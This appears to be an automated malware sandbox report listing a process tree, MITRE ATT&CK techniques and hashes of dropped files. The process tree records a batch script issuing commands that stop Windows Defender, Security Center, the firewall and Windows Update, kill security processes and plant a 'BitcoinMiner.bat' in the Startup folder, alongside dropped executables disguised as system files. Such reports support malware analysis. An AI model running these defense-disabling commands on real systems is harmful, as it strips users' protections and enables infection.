PID:6208

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:6416

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:3332

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\L0Lz.bat"
1⤵
PID:3536
- C:\Windows\system32\net.exe
  net session
  2⤵
  PID:2132
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:5312
- C:\Windows\system32\net.exe
  net stop "SDRSVC"
  2⤵
  PID:4596
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SDRSVC"
    3⤵
    PID:3552
- C:\Windows\system32\net.exe
  net stop "WinDefend"
  2⤵
  PID:5896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "WinDefend"
    3⤵
    PID:4772
- C:\Windows\system32\taskkill.exe
  taskkill /f /t /im "MSASCui.exe"
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:6436
- C:\Windows\system32\net.exe
  net stop "security center"
  2⤵
  PID:1328
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "security center"
    3⤵
    PID:1352
- C:\Windows\system32\net.exe
  net stop sharedaccess
  2⤵
  PID:5500
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sharedaccess
    3⤵
    PID:4792
- C:\Windows\system32\netsh.exe
  netsh firewall set opmode mode-disable
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  PID:4992
- C:\Windows\system32\net.exe
  net stop "wuauserv"
  2⤵
  PID:6052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "wuauserv"
    3⤵
    PID:3232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo tasklist "
  2⤵
  PID:6572
- C:\Windows\system32\find.exe
  find /I "L0Lz"
  2⤵
  PID:7032
- C:\Windows\system32\xcopy.exe
  XCOPY "BitcoinMiner.bat" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
  2⤵
  - Drops startup file
  PID:5764
- C:\Windows\system32\xcopy.exe
  XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
  2⤵
  PID:2428
- C:\Windows\system32\xcopy.exe
  XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
  2⤵
  PID:6716
- C:\Windows\system32\xcopy.exe
  XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
  2⤵
  PID:1220
- C:\Windows\system32\xcopy.exe
  XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
  2⤵
  PID:3596
- C:\Windows\system32\xcopy.exe
  XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
  2⤵
  PID:2252
- C:\Windows\system32\xcopy.exe
  XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
  2⤵
  PID:3252
- C:\Windows\system32\xcopy.exe
  XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
  2⤵
  PID:6228
- C:\Windows\system32\xcopy.exe
  XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
  2⤵
  PID:6760
- C:\Windows\system32\xcopy.exe
  XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
  2⤵
  PID:2664
- C:\Windows\system32\xcopy.exe
  XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
  2⤵
  PID:2784
- C:\Windows\system32\xcopy.exe
  XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
  2⤵
  PID:6016
- C:\Windows\system32\xcopy.exe
  XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
  2⤵
  PID:4836

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:4516

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:6368

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:7036

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:6764

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:4816

C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe
"C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe"
1⤵
- Executes dropped EXE
PID:1460

C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.exe
"C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:3568
- C:\Users\Admin\AppData\Local\Temp\Uninstall.exe
  "C:\Users\Admin\AppData\Local\Temp\Uninstall.exe" end
  2⤵
  - Executes dropped EXE
  PID:6352

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
PID:2508

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Share Discovery

T1135

Password Policy Discovery

T1201

Peripheral Device Discovery

T1120

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\7-Zip\7zFM.exe:Zone.Identifier

Filesize
215B

MD5
598ee27ab773f7ba5cf79afb592e2a81

SHA1
d8dbebefac1b52bf92d577af62dc142b3a8d8da0

SHA256
0db1b32fab6ee0425a2a6f5102cf6b24e385dd54db618928b8c2723197a5cd8c

SHA512
c44a457c4875f74069ff313dd017eb429e66cb7d46d4fd2ad4c542fbfbb0dcf25d2d37aa25bacc82685218c3c47232b6b1022daf18ff8fc19feedd2c79dfd515

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping456_644906758\LICENSE

Filesize
1KB

MD5
ee002cb9e51bb8dfa89640a406a1090a

SHA1
49ee3ad535947d8821ffdeb67ffc9bc37d1ebbb2

SHA256
3dbd2c90050b652d63656481c3e5871c52261575292db77d4ea63419f187a55b

SHA512
d1fdcc436b8ca8c68d4dc7077f84f803a535bf2ce31d9eb5d0c466b62d6567b2c59974995060403ed757e92245db07e70c6bddbf1c3519fed300cc5b9bf9177c

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping456_644906758\manifest.json

Filesize
85B

MD5
c3419069a1c30140b77045aba38f12cf

SHA1
11920f0c1e55cadc7d2893d1eebb268b3459762a

SHA256
db9a702209807ba039871e542e8356219f342a8d9c9ca34bcd9a86727f4a3a0f

SHA512
c5e95a4e9f5919cb14f4127539c4353a55c5f68062bf6f95e1843b6690cebed3c93170badb2412b7fb9f109a620385b0ae74783227d6813f26ff8c29074758a1

Download Submit
C:\ProgramData\Microsoft\Intel\P.exe

Filesize
382KB

MD5
b78c384bff4c80a590f048050621fe87

SHA1
f006f71b0228b99917746001bc201dbfd9603c38

SHA256
8215e35c9ce15a7b7373871b27100577d3e609856eac71080ac13972a6a6748b

SHA512
479acd0d45e5add285ba4472a56918f6933f043c8f28822968ddc724084f8a8cf1fe718d864183eb9e61826e7e16fcc473891520b88591f5dfdef72359084eab

Download Submit
C:\ProgramData\Microsoft\Intel\R8.exe

Filesize
887KB

MD5
ad95d98c04a3c080df33ed75ad38870f

SHA1
abbb43f7b7c86d7917d4582e47245a40ca3f33c0

SHA256
40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd

SHA512
964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe

Filesize
3.6MB

MD5
c5ec8996fc800325262f5d066f5d61c9

SHA1
95f8e486960d1ddbec88be92ef71cb03a3643291

SHA256
892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db

SHA512
4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a

Download Submit
C:\ProgramData\Microsoft\Intel\winlog.exe

Filesize
244KB

MD5
4b2dbc48d42245ef50b975a7831e071c

SHA1
3aab9b62004f14171d1f018cf74d2a804d74ef80

SHA256
54eda5cc37afb3b725fa2078941b3b93b6aec7b8c61cd83b9b2580263ce54724

SHA512
f563e9c6bc521c02490fe66df6cc836e57ec007377efb72259f4a3ae4eb08c4fd43720322982fb211cf8d429874c8795c1a7903cdb79ad92b5174ec5c94533dd

Download Submit
C:\ProgramData\Microsoft\Intel\winlogon.exe

Filesize
35KB

MD5
2f6a1bffbff81e7c69d8aa7392175a72

SHA1
94ac919d2a20aa16156b66ed1c266941696077da

SHA256
dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de

SHA512
ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37

Download Submit
C:\ProgramData\Windows\install.vbs

Filesize
140B

MD5
5e36713ab310d29f2bdd1c93f2f0cad2

SHA1
7e768cca6bce132e4e9132e8a00a1786e6351178

SHA256
cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931

SHA512
8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

Download Submit
C:\ProgramData\Windows\reg1.reg

Filesize
12KB

MD5
806734f8bff06b21e470515e314cfa0d

SHA1
d4ef2552f6e04620f7f3d05f156c64888c9c97ee

SHA256
7ae7e4c0155f559f3c31be25d9e129672a88b445af5847746fe0a9aab3e79544

SHA512
007a79f0023a792057b81483f7428956ab99896dd1c8053cac299de5834ac25da2f6f77b63f6c7d46c51ed7a91b8eccb1c082043028326bfa0bfcb47f2b0d207

Download Submit
C:\ProgramData\Windows\reg2.reg

Filesize
1KB

MD5
6a5d2192b8ad9e96a2736c8b0bdbd06e

SHA1
235a78495192fc33f13af3710d0fe44e86a771c9

SHA256
4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a

SHA512
411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d

Download Submit
C:\ProgramData\Windows\rfusclient.exe

Filesize
1.5MB

MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
C:\ProgramData\Windows\rutserv.exe

Filesize
1.7MB

MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\vp8decoder.dll

Filesize
155KB

MD5
88318158527985702f61d169434a4940

SHA1
3cc751ba256b5727eb0713aad6f554ff1e7bca57

SHA256
4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74

SHA512
5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

Download Submit
C:\ProgramData\Windows\vp8encoder.dll

Filesize
593KB

MD5
6298c0af3d1d563834a218a9cc9f54bd

SHA1
0185cd591e454ed072e5a5077b25c612f6849dc9

SHA256
81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172

SHA512
389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

Download Submit
C:\ProgramData\Windows\winit.exe

Filesize
961KB

MD5
03a781bb33a21a742be31deb053221f3

SHA1
3951c17d7cadfc4450c40b05adeeb9df8d4fb578

SHA256
e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210

SHA512
010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45

Download Submit
C:\ProgramData\microsoft\Temp\5.xml

Filesize
23KB

MD5
487497f0faaccbf26056d9470eb3eced

SHA1
e1be3341f60cfed1521a2cabc5d04c1feae61707

SHA256
9a8efbd09c9cc1ee7e8ff76ea60846b5cd5a47cdaae8e92331f3b7b6a5db4be5

SHA512
3c6b5b29c0d56cfd4b717a964fac276804be95722d78219e7087c4ec787566f223e24421e0e3e2d8a6df5f9c9a5c07f1935f4ba7a83a6a3efa84866e2c1405dd

Download Submit
C:\Programdata\Windows\install.bat

Filesize
418B

MD5
db76c882184e8d2bac56865c8e88f8fd

SHA1
fc6324751da75b665f82a3ad0dcc36bf4b91dfac

SHA256
e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a

SHA512
da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

Filesize
471B

MD5
01fa3211165ca3e0dbd816e5389630bf

SHA1
2a6569707c8ea29cbf996a906855470bb7831f48

SHA256
ab165a9a5b25e6c05f6f2eac77c9dcc9b4157897524a0be4415cdae9cef5636f

SHA512
1848c476ebf00781299715f7c664465a071fa54e3bc14002df35a74aa27667788956bddc4b96b241ea2865f819cf5e33ed7907504a99342c2a0379a0964550ad

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

Filesize
412B

MD5
e60f5925505c9c756cfa077c47824c9e

SHA1
a819a5a92cb546dc096eb50542ab4f50f1286b4c

SHA256
5f31e032abad4a70d6ae3b8f72695c34bb8ce6e8071b9da788567e5484decdc6

SHA512
c9ae2c617d8b51e31018d5e2712ae8d7b58245475700dba560a071caf2613e1040fdd839b1bc0fb3dbb8754aa5a029babbc3cca80655805cfc19b204f7e8aa09

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
b8af007a7546ea5bc1e0609f9fc28e74

SHA1
20ac16cc0eb86b3fe36c2615af06d8971f904dbc

SHA256
fb0241ca22e77d83bc7b1c686dcfa604ee7aee445b20a3abd080582d832e3d66

SHA512
4c2d9beab96ef9809d24168a7b129ac1d950291b27d9cf0b98a5f48747bbf07c9277e6006c1a31acb28dd8c1eeaabe8c2f2567dc8eab9d4968d7ca49cefd81bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
34388e0f2b743d22af6f8865fa57afa1

SHA1
0070f7997b9c1ce4faf1fdf80783b5920cb5210a

SHA256
4c6686bd8385730870eb5649de6dd2a322e16ba79368d8df789ff11bb094fcdc

SHA512
2210812a66da434873d73275311c9a0cdffb7018605ff9380fdc78cdc13fa6ab6adc560dc13eefe816448f0626a020190de475c651f03a047e5aab1f2022c178

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
477918d1815afaad51f22b4aee811b41

SHA1
e24520f51d16bd7a5613996fef18102cb3d40a19

SHA256
c1e49ccee16ce4093048aca8456321d8b48385b3e34651141f73dbfd5648da9a

SHA512
4b5b60964e49d637af55d189eb9798deecfb3fd67d1eb43de6bdf35e1ba326476be33ba1451548f1356bf328c56245d0229f2e99136eaf0e88d82d1841fce4f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
6fa07e51b6f3f2b175ee44751138379d

SHA1
933601d6d9bfb4e27ace4b0bf9d2f802a4880eff

SHA256
1d870f21087fd091ba2942537e912145cfd2fab7b327ae9df0751ed4c444d9e3

SHA512
d1c52c8093c138df6bde9d18090427f134c46a97a9ac2a2aea7763a1e8977e8f06adc98d9ff37d746805e3719423c4be45408fa4c5ee68f55b4a30f73fcf7e04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe5ee414.TMP

Filesize
2KB

MD5
dac8b13f8ff55e97fa9625d2f3572f4e

SHA1
8ca450b05e579ef4709dc7116dac3219edc22a65

SHA256
890e0002301dd1dcf7c02068f240ddebeb751e3c1bfa18d818676bd1ea241f2d

SHA512
1062cb18e994e6d3f0281d130f1931be06462a6ecbd453db664cef9610ce6a81218e86f9aeebd917f49554702d04fce5dd702a47204ae1d19e921f64a0832c82

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnGraphiteCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

Filesize
108KB

MD5
dce75467df0d1956229077ff11781290

SHA1
88713a6f6bad24702c17c5a326612b536d1bad7c

SHA256
c228c531fd131a1e69706522f0c4117efdd16442666071043bae4fb75b7e72a6

SHA512
da96a8c6350621cc048cb2dee991e4cadf6b84d107630e0958eea7d034fb9c586f466539e6500e75f750a5ab2365a9209747a63172e6128235e3b1e18369c91a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
ffe07808273ca05cd02dea5f422bca10

SHA1
27c41c5b00097348d628ae6ab4409289db1c36be

SHA256
a90b433dd7b989831ef2463ce1e9d44730bcf62f79cd2789699aa9fa8db8439c

SHA512
1e7aed99d453297a7c8130d55ef918afcf7162f4bec323d748d4bfb08fee2abd2476818d7bcb36daeb77f2bbc8208b8adf21a6759b3cc4ba0e503b949016d6dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
751afc27c33bd4bc59b9d2b7cd1a664e

SHA1
bbd65ae6aceed3f47edc9d7981edda59bc411829

SHA256
0eefa1c1ad9ebea374f02faf048b0c2e73a39628ca111f2f1dc33e380251345c

SHA512
035b96c83c529b4f70cdab0bdfeaa053b2ec3caf043fabf14b227fe93857b3470cf8d70679c186e121fbd9ecafa94c2b88ec5c24fac178b2dd32d1a3e5411965

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
17KB

MD5
2183ebd7886fc6dfd326e50acf091a53

SHA1
a05ca530c7631309eb279bc7c7655957ea738a44

SHA256
33d228bb40915965200c06930fb0b0905b473f53d1945d8d0276163befb59909

SHA512
4ba665a4e879acccc729a32d36dc48b8cc094ebab8b7b4608a42e880ad04425f30375f0481581db8f4728907f9bb0e447e44f1efa3256a4cdab5923d28c147ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
16KB

MD5
e9ed22868b0cae87584e6832dbec1a52

SHA1
b7dab627bc639bac5f159b62a35a7ea4854838fd

SHA256
0eba00704a37bc205445774fee7da07091baa10697786f1a15f82fd7f117fccd

SHA512
5534b0fdb1ec65070c57529f93d3de6e59e00b05ea1c696876b559b585faf7ae1611e89ee818212fb0ba138f12961ebbb5209261195b0c992938daf440da5d06

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
36KB

MD5
5bc310175bbaa8bb4ede0477dae85cee

SHA1
5976bf2113876c404d438f1fc6f44eda03071127

SHA256
db9d229d0ab292e389922ad3124c138c0793a287462172876d32d3dc0974c56f

SHA512
f960552be9988f021199b08311c7045b53f580ff803ec98f950543282acfc37eea682f19d743d57f9ace7b4ac7d05c7d3ee6b5c4447092f59b77635c3e5c9868

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

Filesize
25KB

MD5
b469406f4a67b75acac7827f5bc4b698

SHA1
12ce2e5b3b9ff07e612c7b56da4fc1c171b061ab

SHA256
e8dd4fdd3903d289ea0fffdd57c7cc7742ef0b35b494169a9f4b7de83ca0aacc

SHA512
70c7e44ec98a2a1afa308897d64007d7b16255e4f1a2bd46b1f138af4dc4899bac22600e8ae9cdea6e44b4b8247f6ea7f7fcb311a864f714f71a99f0eeef69ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
22KB

MD5
47d5ef6ee6e356cc22cd30749bf94eaf

SHA1
7be7329ea412a846dabea1d3f0301b365fe0d18d

SHA256
8546611e37e45bab1de93f78e3eb5296deaafba8e2f330e2ebc3d748db541f16

SHA512
5cf038982f42a11e0a3f87e5c2b7d5bf9996ca33c60f949073674896e603694538893443a0bc710eecae9960b22652a6a7917a22adc3a6eb2317f06f1e4b07c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
896B

MD5
af03cbb1d6e5280dd1a5bd078ca71270

SHA1
ba4398eda4846d03a1240599ce71e0e34106533b

SHA256
325d68de96ad4478c461e7b5a02aa6ffb5ec18521ff9819f808b894632b71c57

SHA512
ba48031b83e0bcb4643966b94c8412df5d33f25972c5590703bd039199f65208ebacbacf0ced12569e621f8e8005ea48811869b28ccef72debac0043271fcfbb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
465B

MD5
7a18a1c063e8062c3ae19956e614662c

SHA1
9c9e0fc15f876afc6cc874c8deae88dd9cce0eae

SHA256
5c0c098ee05b794e9aa314438b44436e4ab56a5d005956fb23782656d336f9c2

SHA512
5a75f578c189504e3d9658661456c9ffa9c3dd20c27732674b594263fdafcc3cefde4024a678ec5dff9f2e89b88982d96a85632fd43652bc650ff8d230b34d41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig

Filesize
19KB

MD5
41c1930548d8b99ff1dbb64ba7fecb3d

SHA1
d8acfeaf7c74e2b289be37687f886f50c01d4f2f

SHA256
16cee17a989167242dd7ee2755721e357dd23bcfcb61f5789cc19deafe7ca502

SHA512
a684d61324c71ac15f3a907788ab2150f61e7e2b2bf13ca08c14e9822b22336d0d45d9ff2a2a145aa7321d28d6b71408f9515131f8a1bd9f4927b105e6471b75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
49KB

MD5
a544ba257a58db3e27354b8181c80ca6

SHA1
94b08579343cfa646c79af347914ec9d16117ce4

SHA256
8264c5ef56635063293b278d839eb0e5b7330aa532f86e58fec25a577a03cfee

SHA512
724d3f51815c7359469845a4d6880be3ce4aa1fd053b32f624f2fef3a9472f973e2804d6254f9964379ffe9655878a4ac3d760b3b4aa98b1c3b1cdef5457fbd7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
55KB

MD5
6118bd23d3a2be7bfed6cf381772a7df

SHA1
39d5b78a68c74231f6ef82c528e910b980c40ff1

SHA256
246742c5d0d7ffec1c8e18537c4bf3749fb3e9c1f92cb195de91904d8b2694da

SHA512
570190e448da0aa2df6af78804e68334d7ddcc12d867eec137f5aabf805a155886a1974453a5c8723a84b53ee9f91ca104bb49827ff8aaed9597f6a1548b32df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
50KB

MD5
9fb9a489169b5ceb192f319fd35ac7cd

SHA1
c32c782fd92215eada31b23f6029376b78343bf7

SHA256
9fb9190613011730edaae62eb64467c68ddc968c82af617adf17e12dde76bc30

SHA512
